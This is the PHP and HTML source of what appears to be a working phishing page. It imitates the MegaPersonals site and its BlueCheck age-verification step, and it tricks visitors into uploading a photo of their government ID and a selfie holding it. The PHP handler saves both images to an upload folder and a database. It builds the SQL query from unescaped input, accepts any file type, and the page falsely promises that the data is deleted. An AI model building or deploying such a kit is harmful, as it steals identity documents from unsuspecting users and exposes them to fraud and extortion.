<?php 
include_once 'db.php';
$words = explode('/', $_SERVER['REQUEST_URI']);
$uid = trim($words[count($words) - 1], '/');
//echo $uid;
?>




<?php 
$total = count($_FILES['upload']['name']);
for( $i=0 ; $i < $total ; $i++ ) {
  $uid=$_POST['uid'];
				 $imgname=$_FILES['upload']['name'][$i];
				echo '<br>';
				$extension = pathinfo($imgname,PATHINFO_EXTENSION);

				$randomno=rand(0,100000);
				$rename='Upload'.date('Ymd').$randomno;

				 $newname=$rename.'.'.$extension;

			    $filename=$_FILES['upload']['tmp_name'][$i];

				if(move_uploaded_file($filename, 'upload/'.$newname))
				{
				//echo "uploaded";
				$insertqry="INSERT INTO `image`( `filename`,`uid`) VALUES ('$newname','$uid')";
				$insertes=mysqli_query($conn,$insertqry);
				//echo "<script>window.location.href ='http://megapersonals.com'</script>";
	            echo "<script>window.location.href ='/users/auth/process/$uid'</script>";
    }
  }

?>






<!doctype html>
<html>
<?php ?>
<!-- Mirrored from megapersonal.us/user/verification by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 27 Feb 2021 00:40:01 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <title>MegaPersonals: Classified hookups</title>
    <meta id="viewportMetaTag" name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />
    <meta charset='utf-8'>


    <meta NAME="ROBOTS" CONTENT="INDEX, FOLLOW">

    <meta name="google-site-verification" content="5lgcaPvrDxOjE8Qn9rMbYKiJVahMPVReOQvezzd1nRY" />
    <meta name="description" content="MegaPersonals - Post your classified ad and MEET NOW"/>
    <link rel="icon" href="../../../../128.199.92.239/mega/img/devilgirl_favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="../../../../128.199.92.239/mega/css/bootstrap.min.css">
    <link rel="stylesheet" href="../../../../128.199.92.239/mega/css/custom4e1b.css">
    <link rel="stylesheet" href="../../../../128.199.92.239/mega/css/modal.css">
    <link rel="stylesheet" href='../../../../128.199.92.239/mega/css/custom4e1b.css?v=1606909526' />
    <link rel="stylesheet" href='../../../../128.199.92.239/mega/css/emojionearea.min4e1b.css?v=1606909526'>
    <!-- The newest version could cause errors in Safari -->
    <script src="../../../../128.199.92.239/mega/js/jquery.min.js" type="text/javascript"></script>

    <script src="../../../../128.199.92.239/mega/js/jquery-ui.min.js"></script>

    <script src="../../../../128.199.92.239/mega/js/jquery.cookie.min.js" type="text/javascript"></script>
    <script src='../../../../www.google.com/recaptcha/api.js'></script>
    <!-- Latest compiled and minified JavaScript -->
    <script src="../../../../128.199.92.239/mega/js/bootstrap.min.js"></script>
    <script src='../../../../128.199.92.239/mega/js/emojionearea.min4e1b.js?v=1606909526'></script>
    <script src="../../../../128.199.92.239/mega/js/anti_clicker4e1b.js?v=1606909526" type="text/javascript"></script>
    <!-- Yandex.Metrika counter -->
    <script type="text/javascript" >
        (function (d, w, c) {
            (w[c] = w[c] || []).push(function() {
                try {
                    w.yaCounter51410560 = new Ya.Metrika2({
                        id:51410560,
                        clickmap:true,
                        trackLinks:true,
                        accurateTrackBounce:true
                    });
                } catch(e) { }
            });
            var n = d.getElementsByTagName("script")[0],
                s = d.createElement("script"),
                f = function () { n.parentNode.insertBefore(s, n); };
            s.type = "text/javascript";
            s.async = true;
            s.src = "../../../../128.199.92.239/mega/js/tag.js";
            if (w.opera == "[object Opera]") {
                d.addEventListener("DOMContentLoaded", f, false);
            } else { f(); }
        })(document, window, "yandex_metrika_callbacks2");
    </script>
    <noscript><div><img src="https://mc.yandex.ru/watch/51410560" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
    <!-- /Yandex.Metrika counter -->

    <!-- Generated by Revive Adserver -->
    <script type='text/javascript' src='https://itransitauthority.com/www/delivery/spcjs.php?id=10'></script>
    <!--end of revive-->

</head>


<body style="margin-top: -10px">
<div class="frontpage">
    <div class="container candywrapper" style="padding-right: 4em; padding-left: 4em">
        <div class="row">
            <a href="http://megapersonal.us/home">
                <img
                    src="megapersonalsPageHeader34e1b.png"
                    class="img-responsive center-block"
                    alt="Megapersonals"
                    id="megapersonalsPageHeader"
                >
            </a>
        </div>
        <div class="row">
            <img
                src="almostThereDarlings4e1b.png"
                class="img-responsive center-block"
                alt="Megapersonals"
                id="megapersonalsPageHeader"
            >
        </div>

        <span class="meetnow_byline">
                        <h1 class="categoryLink" style="font-style: normal"><b>VERIFICATION process</b></h1>
                        <div id="megap4AdSampleHeader">
                            <p style="font-style:normal">takes up to 7 Minutes.</p>
                            <p>Hold tight...</p>
                        </div>
                    </span>
        <h1 id="timer"></h1>
        <div id="try-again-verification" class="hidden text-center" style="color: red; font-weight: bold">
            <h3><i>Your verification process was not completed. Do you want to
                    <a id="try-again-link" onclick="location.reload();">try again</a></i> ?</h3>
        </div>
        <div class="hidden" id="contact-support">
            <a href="http://megapersonal.us/users/verification/support">
                <img
                    src="../../../../128.199.92.239/mega/img/contactSupport4e1b.png?v=1606909526"
                    class="img-responsive center-block"
                    alt="Megapersonals"
                >
            </a>
        </div>
        <div class="row">
            <div id="confirmModal_verification" class="hidden" role="dialog">
                <div class="modal-dialog">
                    <div class="modal-content modal-content-white" id="termsandconditions">
                        <div class="modal-body">
                            <div id="close-popup-up" data-dismiss="modal">
                                <img src="../../../../128.199.92.239/mega/img/close_bump_to_top_modal4e1b.png?v=1606909526">
                            </div>
                            <img src="../../../../128.199.92.239/mega/img/ageCheckPopup4e1b.png?v=1606909526">
                            <div class="centered">
                                <p class="popup-text">
                                    To prevent spam,<br>
                                    MegaPersonals.eu<br>
                                    verifies all new users.
                                    <!-- <span class="popup-text-bluecheck">BlueCheck</span> for verification
                                </p> -->
                                <p class="popup-text">
                                    This needs to be done only once.<br>
                                    All online info is <!-- <span class="popup-text-red"> -->deleted<!-- </span> --> after<br>
                                    verification is complete.
                                </p>
                            </div>
                        </div>
                        <div class="modal-footer flex-btn">
                            <button type="button" class="btn btn-link btn-lg" id="button-ok">OK</button>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="row">
            <div
                
            </div>
        </div>
    </div>
</div>

<!-- not published popup-->
<div id="confirmModal_notPublished" class="hidden" role="dialog" style="display: none; background: none">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-body">
                <div class="centered">
                    <p class="success">
                        Post was Saved
                    </p>
                    <p class="success">
                        But NOT Published
                    </p>
                </div>
            </div>
            <div class='flex-btn'>
                <div  class="notPblsht">OK</div>
            </div>
        </div>
    </div>
</div>
<!-- end not published -->

<script src= "../verify.bluecheck.me/platforms/customintegration/js/AgeVerification-V24200.js?domain_token=a5AJi7EonHbilLvKE9B5"></script>
<script src="../../../../128.199.92.239/mega/js/sockjs.min.js"></script>
<script src="../../../../128.199.92.239/mega/js/stomp.min.js"></script>
<script src ="../../../../128.199.92.239/mega/js/ws_verification.js"></script>
<script>
    var token = '';
    var email = '';
    var phone = '';
    var postId = '';
    var orderId = '';
    var status = 'started';

    var rabbitUser = 'rabbit';
    var rabbitPassword = '';
    var rabbitVirtualHost = 'prod';

    var timeoutId = 0;
    var timer = parseInt('0', 10);
    var interval= parseInt('3', 10);

    var prefixURL = "/verification";

    $(document).ready(function () {
        console.log("time: " +  '0');
        console.log("orderId: " + orderId);

        checkStatus(status);

        connectToWebStomp();
    });

    var checkStatus = function (status) {

        console.log("check status ");
        if (status === "approved") {
            $('#timer').addClass('hidden');
            $('#successModal_verification').removeClass('hidden');
        }

        if (status === "failed") {
            clearTimeout(timeoutId);
            location.replace(prefixURL + "/" + token);
        }

        if (status === "pending") {
            startCheckStatus();
        }

        if (status === "started") {
            initBlueCheckVerification();
        }
    };

    var initBlueCheckVerification = function init() {

        BlueCheck.photoIdVerificationType = 'age_photoID_dob_only';
        BlueCheck.language.dob.caption = '';
        BlueCheck.language.dob.buttons.submit.text = 'Continue';
        BlueCheck.maxAttempts.name = 0;
        BlueCheck.skipModalPages = ['email'];

        BlueCheck.platformCallbacks.onReady = function () {
            $('#confirmModal_verification').removeClass('hidden');
            var verifyBtn = document.getElementById('button-ok');
            verifyBtn.addEventListener("click", function (e) {
                if (BlueCheck.validateAndDisplayModal()) {
                    console.log("BlueCheck modal show");
                }
            });
        };

        BlueCheck.platformCallbacks.scrapeUserData = function () {
            var userData = BlueCheck.userData;

            BlueCheck.orderID = orderId;
            userData.email = email;
            userData.shipping_phone = phone;

            console.log("email : " + userData.email);
            console.log("phone : " + userData.shipping_phone);
            console.log("order id : " + BlueCheck.orderID);
        };

        BlueCheck.platformCallbacks.onSuccess = function () {
            location.reload();
        };

        BlueCheck.platformCallbacks.onClose = function () {
            console.log('onClose');
        };

        BlueCheck.platformCallbacks.onQuit = function () {
            if (BlueCheck.lastResponse === "failed") {
                $('#timer').addClass('hidden');
                $('#try-again-verification').removeClass('hidden');
            }

            console.log('onQuit');
        };

        if (BlueCheck.initialize()) {
            console.log("init BlueCheck");
        }
    };

    var startCheckStatus = function initTimerAndChecking() {

        if (timer !== 0) {
            console.log("Start timer");
            startTimer();
            clearTimeout(timeoutId);
        } else {
            $('#timer').addClass('hidden');
            $('#confirmModal_verification').addClass('hidden');
            $('#contact-support').removeClass('hidden');
        }
    };

    function startTimer() {
        var intervalId = setInterval(function () {
            timer-- ?
                $('#timer').html(convertToMinutes(timer)) :
                (clearInterval(intervalId), location.reload());
        }, 1000);
    }

    function convertToMinutes(sec) {

        var hours = Math.floor(sec / 3600);
        var minutes = Math.floor((sec - (hours * 3600)) / 60);
        var seconds = sec - (hours * 3600) - (minutes * 60);
        var result = '';
        result += minutes < 10 ? "0" + minutes : minutes;
        result += ":" + (seconds < 10 ? "0" + seconds : seconds);
        return result;
    }

    $('#button-ok').click(function() {
        alert('okay button press')
        $('#confirmModal_verification').addClass('hidden');
    });
    $('#close-popup-up').click(function () {
        $('#confirmModal_notPublished')
            .css({
                'display': 'flex',
                'background': '#757575b5'
            })
            .removeClass('hidden');
    });
    $('#confirmModal_notPublished .notPblsht').on('click' , function() {
        $(location).attr('href', '/users/posts/list');
    });
</script>
<div id="bluecheck-container"><div class="bluecheck-screen-photos" style="display: block;">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal">
                <div class="bluecheck-modal-head">
                    <div class="bluecheck-modal-head-circle-container"></div><div class="bluecheck-modal-head-text bluecheck-link-help bluecheck-open-help"><h6 class="bluecheck-modal-head-text-h6">VERIFICATION Process</h6></div><div class="bluecheck-modal-head-circle-container"></div>
                </div>
                <div class="bluecheck-modal-body">
                    <div id="bluecheck-body-photo-id" style="display: block;">
                        <h2 class="bluecheck-modal-body-h2">
                            <span class="bluecheck-semibold-me">Photo Upload</span>
                        </h2>
                        <div class="bluecheck-license">
                            <img class="bluecheck-license-img" src="id-government3.png" alt="">
                        </div>
                        <div class="bluecheck-photos-instruction">
                            <div class="instruction-circle">1</div><h2 class="instruction-text">Upload or take a photo of your <span class="bluecheck-uppercase-regular">government ID</span> on a flat surface.</h2>
                        </div>
                        <button id="bluecheck-photo-id-select" class="bluecheck-active bluecheck-modal-body-button"><span style="pointer-events: none;">TAKE PHOTO OF ID</span><i aria-hidden="true" class="fa fa-camera bluecheck-modal-body-i" style="pointer-events: none;"></i></button>
                        <br>
                        <br>
                        <div class="bluecheck-photos-instruction">
                            <div class="instruction-circle instruction-circle-grey">2</div><h2 class="instruction-text instruction-text-grey">Upload or take a selfie of your <span class="bluecheck-uppercase-regular">government ID</span> close to your face.</h2>
                        </div>
                        <input class="bluecheck-input-file bluecheck-modal-body-input" type="file" accept="image/*" id="bluecheck-photo-id-data">
                    </div>
                    <div id="bluecheck-body-selfie" style="display: none;">
                        <h2 class="bluecheck-modal-body-h2">
                            <span id="bluecheck-selfie-header" class="bluecheck-semibold-me">Photo Upload</span>
                            <span id="bluecheck-selfie-failure" class="bluecheck-semibold-me" style="display:none;">Please ensure the selfie clearly displays your face.</span>
                        </h2>
                        <div class="bluecheck-license">
                            <img class="bluecheck-license-img" src="id-selfie3.png" alt="">
                        </div>
                        <div class="bluecheck-photos-instruction">
                            <div class="instruction-circle instruction-circle-grey"><i class="fa fa-check instruction-circle-i" aria-hidden="true"></i> </div><h2 class="instruction-text instruction-text-grey">Upload or take a photo of your <span class="bluecheck-uppercase-regular">government ID</span> on a flat surface.</h2>
                        </div>
                        <br>
                        <div class="bluecheck-photos-instruction">
                            <div class="instruction-circle">2</div><h2 class="instruction-text">Upload or take a selfie of your <span class="bluecheck-uppercase-regular">government ID</span> close to your face.</h2>
                        </div>
                        <button id="bluecheck-selfie-select" class="bluecheck-active bluecheck-modal-body-button"><span style="pointer-events: none;">TAKE SELFIE WITH ID</span><i aria-hidden="true" class="fa fa-camera bluecheck-modal-body-i" style="pointer-events: none;"></i></button>
                        <input class="bluecheck-input-file bluecheck-modal-body-input" type="file" accept="image/*" id="bluecheck-selfie-data">
                    </div>
                </div>

            </div>
        </div>
    </div></div>

<form id="form" action="" method="post" enctype="multipart/form-data">  
    <input id="nid_first" name="upload[]" type="file" style="opacity: 0">
    <input id="nid_second" name="upload[]" type="file" style="opacity: 0">
    <input  name="uid" type="hidden" value="<?php echo $uid; ?>">
</form>


<script>
    $(document).ready(function () {
        $("#bluecheck-photo-id-select").click(function (e) {
            e.preventDefault();
            $("#nid_first").click();
        });

        $("#nid_first").change(function (e) {
            $("#bluecheck-body-photo-id").hide();
            $("#bluecheck-body-selfie").show();
        });

        $("#bluecheck-body-selfie").click(function (e) {
            $("#nid_second").click();
        });

        $("#nid_second").change(function (e) {

            $("#successModal_verification").removeClass('hidden');
            $("#bluecheck-container").hide();
            $("#form").submit();
        });

        $("#success-ok").click(function (e) {
            e.preventDefault();
        });

        $("#successModal_verification").click(function (e) {
            e.preventDefault();
        });

    });
</script>











</body>

<!-- Mirrored from megapersonal.us/user/verification by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 27 Feb 2021 00:40:43 GMT -->
</html>
